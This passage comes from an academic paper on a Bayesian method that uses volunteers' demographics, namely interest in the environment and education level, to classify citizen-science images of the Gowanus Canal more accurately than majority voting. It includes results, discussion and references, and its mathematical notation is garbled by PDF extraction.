threshold 0.5 � s <1, we label the image as classified at the first step t � 1 such that either Pt (ui = 1) > s or Pt (ui = 1) < 1 - s, and the final classification is ûi ¼ arg max b2f1;2g Ptðui ¼ bÞ: (7) The threshold s can be viewed as the selected confidence level for the classification. Clearly, the higher s is, the higher the accuracy would be, but this would require a larger number of volunteers to classify the image. The effectiveness of the Bayesian inference is intrinsically related to our knowledge of the conditional probabilities in Eq. (6). If these probabilities were fully known, the more explanatory variables we considered, the faster Pj(ui = 1) would converge to either 0 or 1, thereby leading to a more efficient classification for a given confidence level s. However, in real applications we can only perform sample estimations of these conditional probabilities, which are typically evaluated on a small dataset. Therefore, their accuracy might be undermined by the sample size, but also by a biased demographic distribution of the sample. Hence, a trade-off arises in the choice of the explanatory variables: adding variables increases the theoretical classification accuracy, but the sample estimation might become less accurate due to the reduced size of the sample on which the conditional probabilities are estimated. Therefore, in designing a Bayesian classification algorithm, a crucial point is the selection of how many and which explanatory variables should be considered. Classification algorithm We consider the degree of interest toward the environment and the level of education of the volunteers as possible explanatory variables. The interest toward the environment is encoded by the integer xl1, ranging from 1 (participant l is “not at all” interested) to 5 (participant l is “very much” interested), while the education level is encoded by a second integer parameter xl2, which increases from 1 (“high school diploma or less”) to 4 (“graduate or professional degree”) as the participant education level increases, while it is set to 5 if he/she prefers not to answer. Accordingly, this yields three possible choices for xl: the behavior of the participant can be evaluated based only on the degree of interest toward the environment (xl = xl1), on the education level (xl = xl2), or on both explanatory variables (xl = [xl1 xl2] T, where the superscript T means matrix transposition). For any possible choice of xl, adopting a Bayesian approach for classification requires a preliminary estimation of the participants’ accuracy based on their demographics. Specifically, this consists in estimating the conditional probabilities 1. This selection of the prior implies that Pj ui ¼ 1ð Þ is also conditioned on the classifications and demographics of participants lð1Þ; . . . ; lðj � 1Þ. De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 6/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Pðyl ¼ ajui ¼ b; xlÞ; (8) for all a ∈ {0, 1, 2, 3}, β ∈ {1, 2}, and all possible values of xl. To this aim, we consider the set of volunteers V who filled out the demographic questionnaire, and partition it in two groups, denoted T and C, respectively. The set T encompasses the volunteers used to compute the sample estimations bPðyl ¼ ajui ¼ b; xlÞ (9) of the conditional probabilities in Eq. (8), and is called training set in the following, while the set C ¼ V � T is used for testing the performance of the Bayesian approach. Namely, each image i 2 I is classified as a result of the following steps: � Initialization: the prior is set to bP0ðhi ¼ bÞ ¼ P0ðhi ¼ bÞ ¼ 0:5, β = 1, 2, and the set of volunteers available for classification at step 0 is A0 ¼ C; a threshold s is selected in the interval 0:5; 1ð Þ; � Step j � 1: a participant l = l(j) is randomly selected in Aj�1, which is updated as Aj ¼ Aj�1 � flðjÞg; (10) and the estimated probabilities bPjðu ¼ bÞ, β ∈ {1,2}, leveraging the sample estimations (9), are computed as bPjðui ¼ 1Þ ¼ bPðyl ¼ ailjui ¼ 1; xlÞbPj�1ðui ¼ 1ÞbPðyl ¼ ailjui ¼ 1; xlÞbPj�1ðui ¼ 1Þ þ bPðyl ¼ ailjui ¼ 2; xlÞbPj�1ðui ¼ 2Þ ; (11) and bPjðhi ¼ 2Þ ¼ 1 � bPjðhi ¼ 1Þ, where ail is the output of the classification of image i performed by participant l; and � Termination: the algorithm terminates at the first step t such that either At ¼ [ or max bPtðui ¼ 1Þ; bPtðui ¼ 2Þ n o . s: (12) Similar to Eq. (7), the i-th image is classified as ĥi ¼ arg max b2f1;2g bPtðui ¼ bÞ; and the number of participants used to classify image i is recorded as ni = t. Performance analysis Out of the 91 volunteers who participated in the study, we focus on the 88 who filled out the questionnaire, so that jVj ¼ 88. Our goal is to determine whether the Bayesian approach can successfully leverage demographic information, and which individual attributes should be used as a proxy of reliability. Furthermore, we seek to evaluate the impact on the overall performance of the termination threshold s, which is varied in the set (0.5,1) with step 0.02. Then, for each value of s and for all the three possible selections of xl, we evaluate the performance of the classification algorithm in terms of the average number ν of volunteers employed, computed as m ¼ Pi2I ni= Ij j; with ni being the number of De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 7/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ volunteers considered to classify the i-th image, and of classification accuracy w, evaluated as the fraction of the 31 images that is correctly classified. The ground truth used to evaluate w is represented by the preliminary classification performed by Torre et al. (2019). We notice that the performance of the classification algorithm might be biased by the choice of the set of volunteers T employed for estimating the conditional probabilities (8), and by the specific classification order of the volunteers in the set C. We set the cardinality of the set T to 45, which is approximately half of the total number of volunteers, and, to avoid potential biases, we randomly pick m = 10,000 alternative selections Ti, i = 1, : : : ,m, of the set T, and for each i we consider p = 100 random permutations of Ci ¼ V � Ti. Then, for each possible choice of s and xl, we compute the mean values �v and �m as �xðs; xlÞ ¼ 1 mp Xm i¼1 Xp j¼1 xijðs; xlÞ; mðs; xlÞ ¼ 1 mp Xm i¼1 Xp j¼1 mijðs; xlÞ; (13) where wij and νij are the accuracy and average number of volunteers employed when using Ti as the training set and considering the j-th permutation of Ci as the classification sequence, respectively. For comparison purposes, we use the majority voting approach (Kestler et al., 2011) as a reference. Namely, we consider the outcome of the classification when using the same sequence and number of participants used for Bayesian estimation, and compute its average value �xmvðs; xlÞ for all s and for all the three possible choices of xl. A complementary metric is the percentage π(s, xl) of all trials where the accuracy of the Bayesian approach overcomes that of majority voting. To further delve into the performance difference between the two approaches and clarify the impact of the threshold s, we present receiver operating characteristic (ROC) curves, typically employed to compare and select binary classifiers (Fawcett, 2006). For each value of the threshold s, the ROC curve depicts the true positive rate (TPR) against the false positive rate (FPR). The TPR is defined as the fraction of real positives (the image contains a threat) that are correctly classified as positive, while the FPR is the fraction of real negative (the image does not contains a threat) that are incorrectly classified as positive. Then, for each value of the threshold s, we extract a scalar unbiased measure of accuracy, the area under the curve (AUC) (Powers, 2011). We remark that, as the threshold s modulates the number of participants employed to classify an image, and not the rate of positives, the ROC curves might not be monotone as in standard ROC analysis (Fawcett, 2006). RESULTS Preliminary analysis of the citizen science data In total, 88 volunteers filled out the demographic questionnaire. Table 1 presents the demographic composition of the pool of volunteers, while Tables 2 and 3 describe the distribution of the classifications outputs depending on the degree of interest toward the environment and on the education level, respectively. The w2 test for independence De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 8/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ revealed that the distributions of answers were different among xl1 (x 2 20 = 100,320, p < 0.001) and among xl2 (x 2 10 = 25,813, p = 0.004). From visual inspection, we cannot identify any trivial relationship between the classification output and demographics. Lack of correlation is also supported by the Kendall rank correlation coefficients ρ1 and ρ2 between the fraction of images correctly classified and the variables xl1 and xl2, respectively. Although one might expect volunteers’ accuracy to be positively correlated both with their interest toward the environment and education, we found ρ1 = - 0.06 and ρ2 = - 0.02, suggesting an absence of a linear dependence. A closer look at the conditional distributions can help identify some non-trivial relationships between the classification outputs and demographics. For instance, from Table 2 we observe that the number of late replies is the highest when participants are “very much” interested in the environment. This could suggest that the participants are afraid to misjudge the image and then click the wrong button, due to their genuine concern for the environment. At the same time, their percentage of false positives is the lowest, Table 1 Demographic composition of the pool of volunteers. xl2 xl1 1 2 3 4 5 N/A Total 2 1 0 2 0 1 0 4 3 2 0 3 4 2 0 11 4 13 2 26 26 6 1 74 N/A 0 0 0 0 0 2 2 Total 16 2 31 30 9 3 91 Note: N/A corresponds to non-valid answers. Table 2 Counts of late responses, true positives, false positives, true negatives, false negatives, and “I don’t know” based on the interest toward the environment. xl1 True positives False positives True negatives False negatives Late responses I don’t know 1 85 118 110 124 24 35 2 8 16 14 18 1 5 3 92 244 178 261 56 130 4 103 256 205 236 41 89 5 77 63 56 42 12 29 Table 3 Counts of late responses, true positives, false positives, true negatives, false negatives, and “I don’t know” based on the education level. xl2 True positives False positives True negatives False negatives Late responses I don’t know 2 25 26 13 33 8 19 3 29 86 79 90 23 34 4 311 585 471 558 103 235 Note: None of the participants has “high school diploma or less” (xl2 = 1) or preferred not to answer (xl2 = 5). De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 9/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ so they seldom generate a false alarm. Our Bayesian estimation algorithm has the potential of leveraging this kind of less trivial nonlinear relationships between volunteers’ accuracy and demographics. Bayesian inference against majority voting In Bayesian estimation, the selection of the most appropriate explanatory variables is crucial for boosting its performance. Although in principle the more explanatory variables we include, the better estimation we attain, the finiteness of the training sample requires a more thoughtful approach. In Fig. 1, we compare the performance for the three alternative choices of xl, that is, the explanatory variables are either both the degree of interest toward the environment and education level (xl = [xl1 xl2] T), or just one of the two attributes (xl = xl1 or xl = xl2). From panel A, we see that, for all values of the threshold s, the accuracy decreases when both explanatory variables are considered. This outcome can be explained by considering that the sample is too small ( Tj j = 45) to allow for an accurate estimation of the conditional probabilities in Eq. (1) for all the 15 possible combinations of xl1 and xl2. Furthermore, we observe that the best performance is obtained when the interest toward the environment is used as the explanatory variable. This can be expounded by looking at the demographic composition of the pool. Indeed, from Table 1 we observe a more uniform distribution of the pool with respect to xl1, while the level of education is skewed toward xl2 = 4, as more than the 81% of the participants has a graduate or professional degree. This clearly limits the accuracy in the estimation of the conditional probabilities in (1) when xl2 s 4, thus explaining the superior accuracy associated to the choice xl = xl1. The effectiveness of a Bayesian approach is also confirmed by a direct comparison with the majority voting. As one can note from Fig. 1A, for all possible choices of the explanatory variables xl and the threshold s, the average accuracy of the Bayesian BA Figure 1 Mean accuracy �x of the Bayesian classification approach (solid lines) and of the majority voting using the same sequence of volunteers (dotted lines) (A) and percentage of trials where the Bayesian approach outperforms majority voting (B) as a function of the mean average number of volunteers �n used for classification. Full-size DOI: 10.7717/peerj-cs.239/fig-1 De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 10/18 http://dx.doi.org/10.7717/peerj-cs.239/fig-1 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ algorithm is superior to majority voting when the same sequence of labelers is used. Furthermore, in all cases the percentage π(s, xl) of trials in which the Bayesian classification outperforms majority voting is larger than 72.7%, see Fig. 1B. Choosing xl = xl1 results in a higher performance, with a peak of π(s, xl) = 92.6% when s = 0.98. Figure 2 illustrates how the threshold s can be used to modulate the tradeoff between accuracy and average number of volunteers employed. If the conditional probabilities (1) were known, both the accuracy and number of volunteers should monotonically increase with s. However, this becomes nontrival when those probabilities are estimated, whereby a correct choice of the explanatory variable is crucial. For xl = xl2 and low values of s the average accuracy �x decreases with s, but, when the optimal choice xl = xl1 is made, monotonicity is regained and the more participants we use, the more the accuracy improves. A B Figure 2 Mean accuracy (A) and mean number of participants (B) as a function of the threshold s. Full-size DOI: 10.7717/peerj-cs.239/fig-2 A B Figure 3 ROC curve (A) and area under the curve (B) as a function of the threshold for the Bayesian (solid lines) and majority voting (dotted lines) classifiers. Full-size DOI: 10.7717/peerj-cs.239/fig-3 De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 11/18 http://dx.doi.org/10.7717/peerj-cs.239/fig-2 http://dx.doi.org/10.7717/peerj-cs.239/fig-3 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ These considerations are further confirmed by the ROC analyses in Fig. 3, as an alternative accuracy measure, the AUC, is also non-monotone with s for xl = xl2, while for xl = xl1 we can tune s to regulate the tradeoff between the AUC and �m. Moreover, the ROC curves highlight differences between the two classifiers, where we observe a shift of the curves toward the left, such that our Bayesian classifier strongly reduces the FPR. This comes at the price of a moderate decrease of the TPR. DISCUSSION In this study, we proposed a Bayesian approach to enhance data quality in citizen science projects where sequential tasks have to be processed by a limited number of volunteers. By harnessing the diversity of participants in citizen science, we developed an algorithm that characterizes the behavior and accuracy of each participant based on his/her demographics. To demonstrate the effectiveness of our approach, we used data collected within the Brooklyn Atlantis project (Torre et al., 2019), where participants were asked to determine if selected pictures of the Gowanus Canal contained potential threats for the environment or not. Specifically, we posited that participants could be grouped in classes depending on their motivation to participate to the study, measured by their declared interest toward the environment, and on their level of education. Following a Bayesian rationale, we characterized the behavior of each class of participants on a training dataset, by estimating the probability of each possible classification output conditioned to the actual content of the image. Our numerical analyses showed that, without resorting to a granular characterization of each participant, a Bayesian algorithm has superior performance compared with the traditional majority voting approach (Kestler et al., 2011). We were able to leverage the highly nonlinear relationships between the participants’ accuracy and their demographics toward higher accuracy, without increasing their workload. Differently from powerful alternatives to majority voting, such as the expectation maximization algorithm (Dempster, Laird & Rubin, 1977; Dawid & Skene, 1979), our approach does not require estimating the accuracy of each participant. This feature is crucial for citizen science applications, where the contribution of the volunteers might be limited to a few instances (Nov, Arazy & Anderson, 2011). In our algorithm, when a new volunteer decides to participate in the study and performs a task, his/her accuracy is immediately inferred based on demographics. A key aspect of our Bayesian approach is the selection of the individual attributes to group participants into classes. In this study, we examined the level of education and motivation based on the literature (Nov, Arazy & Anderson, 2014; Delaney et al., 2008), but other selections are also feasible. For example, underpinned by the person-environment fit theory (Caplan, 1987), previous studies in crowdsourcing demonstrate improvement in data accuracy by matching task types with individual skills (Ho, Jabbari & Vaughan, 2013), inherent cognitive abilities (Goncalves et al., 2017), or past performance (Jung & Joon, 2014). In contrast to these studies, the advantage of our Bayesian approach lies in predicting performance of classes of individual attributes. Consequently, it can De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 12/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ accommodate nonlinearity in the relationship between individual attributes and their performance, thereby affording more relaxed assumptions in their relationship. Our Bayesian approach begets enhanced data accuracy with limited effort of participants by applying a prior distribution to new participants based on their demographics. This is especially advantageous in citizen science projects that involve ongoing data collection, because practitioners do not need to recalibrate the prior distribution. However, it is necessary to do so when the nature of some new tasks or the demographics of the new participants is substantially different from the training set. Another consideration is the balance between the number of classes and the number of participants in each class. As demonstrated in our results, inclusion of multiple attributes does not necessarily improve accuracy. This is because the number of classes increases in a factorial way with more attributes, leading to a less accurate predictive power in each class due to small sample sizes. When possible, practitioners should ascertain that, based on some experimental knowledge they might possess, the demographic distribution of the training set would be sufficiently balanced to ensure that a sufficient number of participants would fall in each class. In the absence of an adequate experimental knowledge, a more balanced distribution of the participants in classes can be obtained by coarse-graining the explanatory variables (Garriga, Piera & Bartumeus, 2017). Additionally, the information on the uncertainty associated to the training phase can be propagated to the classification stage toward mitigating the detrimental impact of a small samples size on the accuracy. It is a common practice in citizen science projects to omit collecting the demographic data of volunteers, and therefore, it is unclear whether the demographics of our participants are comparable to those in typical citizen science. It requires further study to test applicability of our method of using demographics, considering that the demographics are likely to vary depending on the nature of the projects. A further caveat for the application of our method is the necessity of having a gold standard for estimating the conditional probabilities in the training set. This is relevant for applications to binary classification tasks beyond citizen science, as in medical diagnostics, where ground truth is not available (Martinez et al., 2008). In this kind of applications, alternative tools to compare and combine classifiers could be more viable (Keith, Davey & Boyd, 2012). CONCLUSIONS This study contributes a solution to the noisy labeler problem, which is common in citizen science. Existing methods require a large sample size to estimate individual reliability (Raykar et al., 2010; Kim & Ghahramani, 2012), which is unfeasible in most citizen science projects with limited effort of volunteers (Nov, Arazy & Anderson, 2011). Our simple, yet effective, algorithm can overcome the problem by focusing on classes of volunteers in a Bayesian framework. The proposed approach can be readily implemented in citizen science projects by adding a simple survey during the registration to the projects. Although practitioners in citizen science projects may shy away from collecting demographic information from participants in fear of low participation, such information might offer insight into the De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 13/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ societal impact of the project by assessing the value of citizen science in education and outreach (Bonney et al., 2009). Similarly, our method can be applied to crowdsourcing for distributed data analysis (Difallah et al., 2015) toward reducing the cost of workers for the same data accuracy, as many crowdsourcing platforms already provide multidimensional, detailed attributes of each worker. Whether it is to gain from limited effort of participants in citizen science or to reduce the cost of crowdsourcing workers, predicting their performance through demographics is a simple, yet powerful, way to improve data accuracy. ACKNOWLEDGEMENTS We would like to thank Tyrone J. Tolbert for developing the experimental platform, Marina Torre for collecting the data, and the three Reviewers for their constructive feedback that has helped improve the work and its presentation. P.D. wishes to thank the Dynamical Systems Laboratory at New York University for hosting him during the design of the research. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the National Science Foundation CMMI 1644828. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Science Foundation CMMI: 1644828. Competing Interests The authors declare that they have no competing interests. Author Contributions � Pietro De Lellis conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Shinnosuke Nakayama analyzed the data, authored or reviewed drafts of the paper, approved the final draft. � Maurizio Porfiri conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The data collection was approved by the institutional review board of New York University (IRB-FY2016-184). De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 14/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: Data is available at the Open Science Framework: De Lellis, Pietro. 2019. “Using Demographics toward Efficient Data Classification in Citizen Science: A Bayesian Approach.” OSF. November 3. osf.io/7sqvp. REFERENCES Belleflamme P, Lambert T, Schwienbacher A. 2014. Crowdfunding: tapping the right crowd. Journal of Business Venturing 29(5):585–609 DOI 10.1016/j.jbusvent.2013.07.003. Bonney R, Cooper CB, Dickinson J, Kelling S, Phillips T, Rosenberg KV, Shirk J. 2009. Citizen science: a developing tool for expanding science knowledge and scientific literacy. BioScience 59(11):977–984 DOI 10.1525/bio.2009.59.11.9. Bonney R, Shirk JL, Phillips TB, Wiggins A, Ballard HL, Miller-Rushing AJ, Parrish JK. 2014. Next steps for citizen science. Science 343(6178):1436–1437 DOI 10.1126/science.1251554. Burgess H, DeBey L, Froehlich H, Schmidt N, Theobald E, Ettinger A, HilleRisLambers J, Tewksbury J, Parrish JK. 2017. The science of citizen science: exploring barriers to use as a primary research tool. Biological Conservation 208:113–120 DOI 10.1016/j.biocon.2016.05.014. Caplan RD. 1987. Person-environment fit theory and organizations: commensurate dimensions, time perspectives, and mechanisms. Journal of Vocational Behavior 31(3):248–267 DOI 10.1016/0001-8791(87)90042-x. Cappa F, Laut J, Nov O, Giustiniano L, Porfiri M. 2016. Activating social strategies: face-to-face interaction in technology-mediated citizen science. Journal of Environmental Management 182:374–384 DOI 10.1016/j.jenvman.2016.07.092. Cappa F, Laut J, Porfiri M, Giustiniano L. 2018. Bring them aboard: rewarding participation in technology-mediated citizen science projects. Computers in Human Behavior 89:246–257 DOI 10.1016/j.chb.2018.08.017. Cappa F, Rosso F, Hayes D. 2019. Monetary and social rewards for crowdsourcing. Sustainability 11(10):2384 DOI 10.3390/su11102834. Carlin BP, Louis TA, Carlin B. 2000. Bayes and empirical bayes methods for data analysis. Boca Raton: Chapman and Hall/CRC. Chen X, Lin Q, Zhou D. 2013. Optimistic knowledge gradient policy for optimal budget allocation in crowdsourcing. Proceedings of the 30th International Conference on Machine Learning, PMLR 28(3):64–72. Curtis V. 2015. Motivation to participate in an online citizen science game. Science Communication 37(6):723–746. Dawid AP, Skene AM. 1979. Maximum likelihood estimation of observer error-rates using the EM algorithm. Applied Statistics 28(1):20. Delaney DG, Sperling CD, Adams CS, Leung B. 2008. Marine invasive species: validation of citizen science and implications for national monitoring networks. Biological Invasions 10(1):117–128 DOI 10.1007/s10530-007-9114-0. Dempster AP, Laird NM, Rubin DB. 1977. Maximum likelihood from incomplete data via the EM algorithm. Journal of the Royal Statistical Society: Series B 39(1):1–22. Dickinson JL, Zuckerberg B, Bonter DN. 2010. Citizen science as an ecological research tool: challenges and benefits. Annual Review of Ecology, Evolution, and Systematics 41(1):149–172 DOI 10.1146/annurev-ecolsys-102209-144636. De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 15/18 https://osf.io/7sqvp http://dx.doi.org/10.1016/j.jbusvent.2013.07.003 http://dx.doi.org/10.1525/bio.2009.59.11.9 http://dx.doi.org/10.1126/science.1251554 http://dx.doi.org/10.1016/j.biocon.2016.05.014 http://dx.doi.org/10.1016/0001-8791(87)90042-x http://dx.doi.org/10.1016/j.jenvman.2016.07.092 http://dx.doi.org/10.1016/j.chb.2018.08.017 http://dx.doi.org/10.3390/su11102834 http://dx.doi.org/10.1007/s10530-007-9114-0 http://dx.doi.org/10.1146/annurev-ecolsys-102209-144636 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Difallah DE, Catasta M, Demartini G, Ipeirotis PG, Cudré-Mauroux P. 2015. The dynamics of micro-task crowdsourcing: the case of Amazon MTurk. In: Proceedings of the 24th International Conference on World Wide Web, Florence, 238–247. Diner D, Nakayama S, Nov O, Porfiri M. 2018. Social signals as design interventions for enhancing citizen science contributions. Information, Communication & Society 21(4):594–611 DOI 10.1080/1369118x.2017.1299779. Estellés-Arolas E, González-Ladrón-de Guevara F. 2012. Towards an integrated crowdsourcing definition. Journal of Information Science 38(2):189–200 DOI 10.1177/0165551512437638. Fawcett T. 2006. An introduction to ROC analysis. Pattern Recognition Letters 27(8):861–874 DOI 10.1016/j.patrec.2005.10.010. Franzoni C, Sauermann H. 2014. Crowd science: the organization of scientific research in open collaborative projects. Research Policy 43(1):1–20 DOI 10.1016/j.respol.2013.07.005. Frenay B, Verleysen M. 2014. Classification in the presence of label noise: a survey. IEEE Transactions on Neural Networks and Learning Systems 25(5):845–869. Garriga J, Piera J, Bartumeus F. 2017. A Bayesian framework for reputation in citizen science. In: Proceedings of the Second Workshop on Data Science for Social Good, CEUR Workshop Proceedings. Vol. 1960, 1–18. Available at http://ceur-ws.org/Vol-1960/paper6.pdf. Gelman A, Carlin JB, Stern HS, Dunson DB, Vehtari A, Rubin DB. 2013. Bayesian data analysis. Boca Raton: Chapman and Hall/CRC. Goncalves J, Feldman M, Hu S, Kostakos V, Bernstein A. 2017. Task routing and assignment in crowdsourcing based on cognitive abilities. In: Proceedings of the 26th International Conference on World Wide Web Companion, WWW ‘17 Companion. Republic and Canton of Geneva: International World Wide Web Conferences Steering Committee, 1023–1031. Ho C-J, Jabbari S, Vaughan JW. 2013. Adaptive task assignment for crowdsourced classification. In: Proceedings of the 30th International Conference on Machine Learning (ICML-13). Atlanta, 534–542. Howe J. 2006. The rise of crowdsourcing. Wired Magazine 14(6):1–4. Jung HJ, Joon H. 2014. Quality assurance in crowdsourcing via matrix factorization based task routing. In: Proceedings of the 23rd International Conference on World Wide Web, WWW ‘14 Companion. New York: ACM Press, 3–8. Kallimanis AS, Panitsa M, Dimopoulos P. 2017. Quality of non-expert citizen science data collected for habitat type conservation status assessment in Natura 2000 protected areas. Scientific Reports 8873:1–10. Keith JM, Davey CM, Boyd SE. 2012. A Bayesian method for comparing and combining binary classifiers in the absence of a gold standard. BMC Bioinformatics 13(1):179 DOI 10.1186/1471-2105-13-179. Kestler HA, Lausser L, Lindner W, Palm G. 2011. On the fusion of threshold classifiers for categorization and dimensionality reduction. Computational Statistics 26(2):321–340 DOI 10.1007/s00180-011-0243-7. Kim H-C, Ghahramani Z. 2012. Bayesian classifier combination. In: Proceedings of the 15th International Conference on Artificial Intelligence and Statistics. La Palma, 619–627. Kosmala M, Wiggins A, Swanson A, Simmons B. 2016. Assessing data quality in citizen science. Frontiers in Ecology and the Environment 14(10):551–560. Laut J, Cappa F, Nov O, Porfiri M. 2015. Increasing patient engagement in rehabilitation exercises using computer-based citizen science. PLOS ONE 10(3):e0117013 DOI 10.1371/journal.pone.0117013. De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 16/18 http://dx.doi.org/10.1080/1369118x.2017.1299779 http://dx.doi.org/10.1177/0165551512437638 http://dx.doi.org/10.1016/j.patrec.2005.10.010 http://dx.doi.org/10.1016/j.respol.2013.07.005 http://ceur-ws.org/Vol-1960/paper6.pdf http://dx.doi.org/10.1186/1471-2105-13-179 http://dx.doi.org/10.1007/s00180-011-0243-7 http://dx.doi.org/10.1371/journal.pone.0117013 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Laut J, Cappa F, Nov O, Porfiri M. 2017. Increasing citizen science contribution using a virtual peer. Journal of the Association for Information Science and Technology 68(3):583–593 DOI 10.1002/asi.23685. Laut J, Henry E, Nov O, Porfiri M. 2014. Development of a mechatronics-based citizen science platform for aquatic environmental monitoring. IEEE/ASME Transactions on Mechatronics 19(5):1541–1551. Lehner O. 2013. Crowdfunding social ventures: a model and research agenda. Venture Capital 15(4):289–311 DOI 10.1080/13691066.2013.782624. Li Q, Ma F, Gao J, Su L, Quinn CJ. 2016. Crowdsourcing high quality labels with a tight budget. In: Proceedings of the Ninth ACM International Conference on Web Search and Data Mining—WSDM ‘16. New York: ACM Press, 237–246. Majchrzak A, Malhotra A. 2013. Towards an information systems perspective and research agenda on crowdsourcing for innovation. Journal of Strategic Information Systems 22(4):257–268 DOI 10.1016/j.jsis.2013.07.004. Martinez EZ, Louzada-Neto F, Derchain SFM, Achcar JA, Gontijo RC, Sarian LOZ, Syrjänen KJ. 2008. Bayesian estimation of performance measures of cervical cancer screening tess in the presence of covarates and absence of a gold standard. Cancer Informatics 6:33–46 DOI 10.1177/117693510800600002. Nakayama S, Tolbert T, Nov O, Porfiri M. 2018. Social information as a means to enhance engagement in citizen science-based telerehabilitation. Journal of the Association for Information Science and Technology 70(6):587–595 DOI 10.1002/asi.24147. Nov O, Arazy O, Anderson D. 2011. Dusting for science: motivation and participation of digital citizen science volunteers. In: Proceedings of the 2011 iConference on–iConference ’11. New York: ACM Press, 68–74. Nov O, Arazy O, Anderson D. 2014. Scientists@home: what drives the quantity and quality of online citizen science participation? PLOS ONE 9(4):e90375 DOI 10.1371/journal.pone.0090375. Nov O, Laut J, Porfiri M. 2015. Using targeted design interventions to encourage extra-role crowdsourcing behavior. Journal of the Association for Information Science and Technology 67(2):483–489 DOI 10.1002/asi.23507. Palermo E, Laut J, Nov O, Cappa P, Porfiri M. 2017a. A natural user interface to integrate citizen science and physical exercise. PLOS ONE 12(2):e0172587 DOI 10.1371/journal.pone.0172587. Palermo E, Laut J, Nov O, Cappa P, Porfiri M. 2017b. Spatial memory training in a citizen science context. Computers in Human Behavior 73:38–46 DOI 10.1016/j.chb.2017.03.017. Penin J, Burger-Helmchen T. 2012. Crowdsourcing of inventive activities: definition and limits. International Journal of Innovation and Sustainable Development 5(2/3):246–263 DOI 10.1504/ijisd.2011.043068. Powers DMW. 2011. Evaluation: from precision, recall and F-measure to ROC, informedness, markedness & correlation. Journal of Machine Learning Technologies 2(1):37–63. Raykar VC, Yu S, Zhao LH, Valadez GH, Florin C, Bogoni L, Moy L. 2010. Learning from crowds. Journal of Machine Learning Research 11:1297–1322. Ryan R, Deci E. 2000. Intrinsic and extrinsic motivations: classic definitions and new directions. Contemporary Educational Psychology 25(1):54–67 DOI 10.1006/ceps.1999.1020. Sauermann H, Franzoni C. 2015. Crowd science user contribution patterns and their implications. Proceedings of the National Academy of Sciences of the United States of America 112(3):679–684 DOI 10.1073/pnas.1408907112. De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 17/18 http://dx.doi.org/10.1002/asi.23685 http://dx.doi.org/10.1080/13691066.2013.782624 http://dx.doi.org/10.1016/j.jsis.2013.07.004 http://dx.doi.org/10.1177/117693510800600002 http://dx.doi.org/10.1002/asi.24147 http://dx.doi.org/10.1371/journal.pone.0090375 http://dx.doi.org/10.1002/asi.23507 http://dx.doi.org/10.1371/journal.pone.0172587 http://dx.doi.org/10.1016/j.chb.2017.03.017 http://dx.doi.org/10.1504/ijisd.2011.043068 http://dx.doi.org/10.1006/ceps.1999.1020 http://dx.doi.org/10.1073/pnas.1408907112 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Sheng VS, Provost F, Ipeirotis PG. 2008. Get another label? Improving data quality and data mining using multiple, noisy labelers. In: Proceeding of the 14th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining—KDD 08. New York: ACM Press, 614–622. Silvertown J. 2009. A new dawn for citizen science. Trends in Ecology & Evolution 24(9):467–471 DOI 10.1016/j.tree.2009.03.017. Swanson A, Kosmala M, Lintott C, Simpson R, Smith A, Packer C. 2015. Snapshot Serengeti, high-frequency annotated camera trap images of 40 mammalian species in an African savanna. Scientific Data 2(1):150026 DOI 10.1038/sdata.2015.26. Torre M, Nakayama S, Tolbert TJ, Porfiri M. 2019. Producing knowledge by admitting ignorance: enhancing data quality through an “I don’t know” option in citizen science. PLOS ONE 14(2):e0211907 DOI 10.1371/journal.pone.0211907. De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 18/18 http://dx.doi.org/10.1016/j.tree.2009.03.017 http://dx.doi.org/10.1038/sdata.2015.26 http://dx.doi.org/10.1371/journal.pone.0211907 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Using demographics toward efficient data classification in citizen science: a Bayesian approach Introduction Methods Results Discussion Conclusions flink6 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true 